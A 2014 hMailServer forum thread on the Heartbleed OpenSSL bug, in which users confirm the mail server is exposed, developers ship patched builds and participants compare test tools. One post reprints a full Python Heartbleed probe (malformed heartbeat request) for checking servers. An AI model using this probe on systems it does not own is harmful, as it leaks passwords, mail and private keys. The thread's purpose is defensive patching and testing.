Heartbleed Bug in OpenSSL

Posted: 2014-04-08 11:15
by yetanotherb
Hi,

is hMailServer in any way affected by the Heartbleed Bug in OpenSSL?
(http://heartbleed.com/)

This is a VERY serious problem :-(

Best regards,
B

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 12:19
by mlg.odk
Yes, hMailServer is vulnerable. Even worse, OpenSSL is statically linked, so there is no way for the end user to patch this until an official update is released.

I recommend you to take your server offline until this issue is addressed. I just ran a testing script against one of my servers, and it happily replied with private e-mails and passwords.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 12:33
by yetanotherb
Oooh boy.... :shock: :(

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 13:10
by martin
I will look into this and release a patch.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 13:56
by percepts
Reading the full information release and the linked openssl.org news release, it seems there is an easy fix.
Just use one of the earlier releases of openssl or the fix release (OpenSSL 1.0.1g) to regenerate your certificates.
What versions of OpenSSL are affected?

Status of different versions:
• OpenSSL 1.0.1 through 1.0.1f (inclusive) are vulnerable
• OpenSSL 1.0.1g is NOT vulnerable
• OpenSSL 1.0.0 branch is NOT vulnerable
• OpenSSL 0.9.8 branch is NOT vulnerable

Bug was introduced to OpenSSL in December 2011 and has been out in the wild since OpenSSL release 1.0.1 on 14th of March 2012. OpenSSL 1.0.1g released on 7th of April 2014 fixes the bug.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:25
by SCOOBY
Hi,
Is there any way I can tell what version of OpenSSL my installation is using?
Cheers

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:29
by mlg.odk
percepts wrote: Just use one of the earlier releases of openssl or the fix release (OpenSSL 1.0.1g) to regenerate your certificates.
Unfortunately, this issue is not about certificates. It is an issue in the implementation of the TLS protocol. Long story short, it is currently possible for anyone, without authentication, to grab the passwords of any recently logged on users, their recently sent e-mails, or your cryptographic keys, over the internet and without leaving a trace. The only solution for this issue is to update hMailServer once a patch is out.

@martin: I am looking forward to the update.
SCOOBY wrote: Is there any way I can tell what version of OpenSSL my installation is using?
hMailServer 5.4 is using OpenSSL 1.0.1c.
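Added example, not code from this thread or from the hMailServer project: a Python 3 checker for the question above. It scans a binary for the version banner OpenSSL embeds as a plain string (a statically linked build carries it too) and compares each hit against the affected range quoted earlier in the thread, 1.0.1 through 1.0.1f. All function names are the example's own, and the sample bytes are constructed rather than taken from a real hMailServer build.

```python
import re
from typing import List, Optional, Tuple

# OpenSSL 0.9.x/1.0.x stores its version banner as a plain C string, e.g.
# "OpenSSL 1.0.1c 10 May 2012"; the ssl library also embeds variants such as
# "SSLv3 part of OpenSSL 1.0.1c 10 May 2012". All share the "OpenSSL <ver>" core.
BANNER_RE = re.compile(rb"OpenSSL (\d+)\.(\d+)\.(\d+)([a-z]?)(?![\w.])")

Version = Tuple[int, int, int, str]  # (major, minor, fix, patch letter or "")

def parse_version(text: str) -> Optional[Version]:
    """Turn a banner fragment such as '1.0.1c' into (1, 0, 1, 'c'); None if malformed."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]?)", text.strip())
    if not m:
        return None
    return int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4)

def is_heartbleed_vulnerable(version: Version) -> bool:
    """Affected range as listed in the thread: 1.0.1 through 1.0.1f inclusive.
    1.0.1g, the 1.0.0 branch and the 0.9.8 branch are not affected."""
    major, minor, fix, letter = version
    if (major, minor, fix) != (1, 0, 1):
        return False
    return letter == "" or letter <= "f"

def find_openssl_versions(blob: bytes) -> List[Version]:
    """Scan raw binary content for embedded OpenSSL banners (deduplicated, in order found)."""
    found: List[Version] = []
    for m in BANNER_RE.finditer(blob):
        v = (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4).decode("ascii"))
        if v not in found:
            found.append(v)
    return found

def assess_binary(blob: bytes) -> dict:
    """Report every embedded OpenSSL version and whether any falls in the affected range."""
    versions = find_openssl_versions(blob)
    return {
        "versions": [f"{v[0]}.{v[1]}.{v[2]}{v[3]}" for v in versions],
        "vulnerable": any(is_heartbleed_vulnerable(v) for v in versions),
    }

def scan_file(path: str) -> dict:
    """Assess an executable or DLL on disk, e.g. an hMailServer.exe with OpenSSL linked in."""
    with open(path, "rb") as f:
        return assess_binary(f.read())

# Constructed stand-in for a statically linked binary (NOT bytes from a real hMailServer
# build): header junk, the banners the ssl library embeds, and some padding.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 32
    + b"SSLv3 part of OpenSSL 1.0.1c 10 May 2012\x00"
    + b"TLSv1 part of OpenSSL 1.0.1c 10 May 2012\x00"
    + b"\xcc" * 16
    + b"OpenSSL 1.0.1c 10 May 2012\x00"
)

if __name__ == "__main__":
    import sys
    # Pass a path to scan a real file; with no argument the constructed sample is assessed.
    print(scan_file(sys.argv[1]) if len(sys.argv) > 1 else assess_binary(SAMPLE_BINARY))
```

A hit in the affected range tells you the library needs replacing; it says nothing about whether the process actually exposes TLS ports, which is the separate question raised further down the thread.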

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:33
by martin
I sent a security newsletter a while back informing users about this issue.

Personally I've disabled the SSL TCP/IP-ports until patched, so I am still able to receive email using SMTP on port 25. Of course this won't work for everyone.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:35
by SCOOBY
Thanks, eagerly awaiting the update!

Also, if a server does not have an SSL certificate installed, and only non-ssl ports are open, is it still vulnerable?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 14:39
by martin
If you don't have TCP/IP ports, then OpenSSL isn't executed within hMailServer so then it should not be vulnerable.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:07
by Greta
From which version does hmail use OpenSSL 1.0.1?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:18
by Bill48105
2014-04-08 5.4-B2014040801
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* Updated hmailserver to openssl-1.0.1g
* ONLY MINIMALLY TESTED. VULNERABILITY ERADICATION UNTESTED. Just built openssl-1.0.1g & incorporated into this build.

http://www.hmailserver.com/forum/viewto ... 10&t=21420

EDIT:
Also posted a non-statically linked build so OpenSSL DLLs can be used if needed. Obviously weird things can happen if you use incompatible DLLs, so know what you are doing & only use it if needed.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:59
by SCOOBY
Sorry if I'm being dense, but where do I download it from?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 19:59
by mlg.odk
Thanks Bill48105, I can confirm that this update resolves the issue.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:03
by Bill48105
SCOOBY wrote: Sorry if I'm being dense, but where do I download it from?
You go to the experimental thread:
http://www.hmailserver.com/forum/viewto ... 10&t=21420
Scroll WAYYY down to where the downloads are:

Code:

NEWEST & MOST RECENT:
=== 8Apr2014 === (BASED on official 5.4 B1950 + to-date experimental changes)
* URGENT: Heartbleed zero day openSSL fix http://www.zdnet.com/heartbleed-serious ... 000028166/
* IMPORTANT: This build has a LOT of extra debug logging but NOT shown by default. [Settings]LogLevel=10 for some extra to 100 for extremely verbose
NOTE: Should be stable but not recommended live on production until tested further

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:05
by Bill48105
mlg.odk wrote: Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:14
by mlg.odk
Bill48105 wrote:
mlg.odk wrote: Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:22
by Bill48105
mlg.odk wrote:
Bill48105 wrote:
mlg.odk wrote: Thanks Bill48105, I can confirm that this update resolves the issue.
Ok great! How did you test it?
Thx
Bill
There is an online testing tool available here: http://filippo.io/Heartbleed/ (specify some port used by hMailServer as it defaults to 443).
OK cool thx. Yup it claims it's ok now. Assuming it is true it's good then eh.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:29
by SCOOBY
Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:42
by martin
Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:46
by Bill48105
martin wrote: Same thing here. Either the issue is not deterministic, or the test at http://filippo.io/Heartbleed is broken.

Currently compiling the new version.
SCOOBY wrote: Well....
I've just tested my un-patched hMailServer on that URL and it's saying it is fine...
I'm running 5.3.3-B1879 at the moment.

Any ideas?
Luc from IRC tested before & after with the python script & claims it reported vulnerable before & OK after.
If anyone else wants to test:
https://gist.github.com/sh1n0b1/10100394

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:47
by RvdH
heartbleedtest.py

Code:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

# Modified for simplified checking by Yonathan Klijnsma

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

target = None

options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')

def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')

hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01
''')

hb = h2bin('''
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    for b in xrange(0, len(s), 16):
        lin = [c for c in s[b : b + 16]]
        hxdat = ' '.join('%02X' % ord(c) for c in lin)
        pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
        print '  %04x: %-48s %s' % (b, hxdat, pdat)
    print

def recvall(s, length, timeout=5):
    endtime = time.time() + timeout
    rdata = ''
    remain = length
    while remain > 0:
        rtime = endtime - time.time() 
        if rtime < 0:
            return None
        r, w, e = select.select([s], [], [], 5)
        if s in r:
            data = s.recv(remain)
            # EOF?
            if not data:
                return None
            rdata += data
            remain -= len(data)
    return rdata
        

def recvmsg(s):
    hdr = recvall(s, 5)
    if hdr is None:
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        return None, None, None
 
    return typ, ver, pay

def hit_hb(s):
    global target
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print target + '|NOT VULNERABLE'
            return False

        if typ == 24:
            if len(pay) > 3:
                print target + '|VULNERABLE'
            else:
                print target + '|NOT VULNERABLE'
            return True

        if typ == 21:
            print target + '|NOT VULNERABLE'
            return False

def main():
    global target
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sys.stdout.flush()
    s.connect((args[0], opts.port))
    target = args[0]
    sys.stdout.flush()
    s.send(hello)
    sys.stdout.flush()
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            return
        # Look for server hello done message.
        if typ == 22 and ord(pay[0]) == 0x0E:
            break

    sys.stdout.flush()
    s.send(hb)
    hit_hb(s)

if __name__ == '__main__':
    main()
usage:
heartbleedtest.py domainname -p 993
heartbleedtest.py domainname -p 995
heartbleedtest.py domainname -p 465

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:47
by sowen
http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:49
by Bill48105
sowen wrote: http://filippo.io/Heartbleed also says my hMailserver installation B1950 is clean.
That's not looking good in terms of trusting that test.. Did you try the python script?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 20:57
by lucb1e
I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:01
by Bill48105
lucb1e wrote: I'd say the filippo.io bug is faulty then:

- I've tried the python script (not the one posted above, but another one) before patching, which said 5.4-B1950 is vulnerable;

- I've tried that same python script after patching which said 5.4-B2014040801 is *not* vulnerable; and

- I've tried filippo.io after patching which said I was *not* vulnerable.

So I'm not sure whether filippo.io works properly, but B1950 definitely was vulnerable for me. In the python script I saw some of my own e-mail. Filippo.io does seem to work on checking whether apache is vulnerable though, those results usually match python's.
Thanks for the info. I'd sooner say not to trust that site at this point. Maybe a bug, maybe not designed to test mail or maybe they are a front to gather info about vulnerable servers. :o

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:30
by martin
There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:32
by Bill48105
martin wrote: There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 21:40
by yetanotherb
Great Job!

Thanks a lot for the fast response!

Best regards,
B

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 22:04
by SCOOBY
Thanks guys, server patched and hopefully that is that!!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 22:17
by sowen
This tester reports the patched version as not vulnerable:
http://possible.lv/tools/hb/?sp

Thanks!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:05
by mattg
Bill48105 wrote:
martin wrote: There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:36
by Bill48105
mattg wrote:
Bill48105 wrote:
martin wrote: There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Cool thx martin.
NOTE: That build does not contain starttls or other post B1950 changes I've put in my experimental builds though. So anyone who was on B1950 can upgrade to B1951 but anyone who needs starttls or other changes I've made should use my experimental build from today.
I don't need StartTLS (but am happy to test it)

I do need the OTHER fixes that you have incorporated into your ALPHA builds...Like the UTF-8 Indexing, the IOCP fixes etc

Where is this stuff at in terms of the new build?
martin is moving away from the SVN repo in favor of github. He had set up a 'dev' one there a while back but I stuck with the svn until I was able to get my local copy cleaned up enough to commit. I've just not had time. Now martin is setting up a new copy on github and setting up automated builds. Should help keep them in sync.

So, long story short, only my builds have a lot of the recent 'experimental' changes until I can get them to martin so he can approve & merge with his, but no ETA.
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-08 23:54
by Sune
Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-09 01:11
by japi
martin wrote: There's a build available here now:
http://download.hmailserver.com/hMailSe ... -B1951.exe

I'm running it myself and it passes the heartbleed tests.
Martin,
I want to thank you (and of course everyone who contributed!) for your quick reaction.
This is a level of service I would expect from a company, but not from a small project (most companies would most likely not react as fast as you did!).
The last 24 hours weren't the brightest in the history of the internet, but hmailserver and many other opensource projects have done a great job in mitigating the most severe incident I can remember in the past 7 years. It was the sysadmin's nightmare come true, every SSL port an enemy.
It's time to get some sleep, now that the Heartbleeding has stopped... :mrgreen:
Thanks a Million and keep up the great work!

Best Regards,
Jan

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-10 19:30
by Kob
For what it's worth, I found out that the on-line testing at
http://possible.lv/tools/hb/
provides more informative results than the test at filippo.io

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-11 10:54
by Caspar
That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server, update now to the latest stable or experimental build (whichever one you need, because of specific options). After you have done that, create a new certificate, since the private key could have been compromised.
Steps on how to create a new certificate can be found here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-11 18:50
by Bill48105
Caspar wrote: That testing method is only good for testing it on HTTPS sites, if you want to use anything else you will probably need a different checking tool, and I have yet to find one that works correctly with IMAP, POP and SMTP.

Simple: if you have used SSL with your server, update now to the latest stable or experimental build (whichever one you need, because of specific options). After you have done that, create a new certificate, since the private key could have been compromised.
Steps on how to create a new certificate can be found here: http://www.hmailserver.com/forum/viewto ... 12&t=22371
When creating a new certificate make sure you use a new private key!
The python scripts above work. I tested them with hmail.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-14 10:05
by Caspar
Bill48105 wrote:
Caspar wrote: ...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-14 10:40
by Bill48105
Caspar wrote:
Bill48105 wrote:
Caspar wrote: ...
The python scripts above work. I tested them with hmail.
It only works if it is using SSL all the time. If it does not use SSL all the time (like if you want to use STARTTLS) it does not work.
Yeah, I hadn't tested it on a non-SSL port, but I guess that makes sense since the handshake hasn't completed yet on a STARTTLS-enabled port, although it is an SSL socket even before the handshake. But if one wants to test, just test SSL, and if it's OK the STARTTLS ports would be too, unless someone proves otherwise.
Bill

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 15:15
by esc
Sune wrote: Doesn't 5.3.3 build 1879 use a previous version of OpenSSL, that isn't affected by the bug?
As far as I can see the bug was introduced in OpenSSL 1.0.1 that was released in December 2011, while hMS build 1879 was released in June 2010 (=before the bug).
I would also like a definitive answer to this.

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 15:46
by percepts

Re: Heartbleed Bug in OpenSSL

Posted: 2014-04-30 17:50
by Bill48105
Version 5.3.3 - Build 1879 (2010-06-06) - Production

Issue 312: In some cases, the POP3 server returned incorrect data which could lead to corrupt attachments. Changes have been made to prevent this error. The error was apparent when retrieving PDF files which had been sent using Outlook Express.
Issue 313: If hMailServer was configured to download messages from a server which did not support UIDL, hMailServer timed out. hMailServer has been changed to disconnect immediately and report an error when this happens. The External account functionality in hMailServer does not work with POP3 servers not supporting UIDL.
Issue 314: If DKIM was enabled and a user sent an email with no text in the body, hMailServer did not correctly sign the message.
Issue 1879: OpenSSL has been upgraded to version 0.9.8o.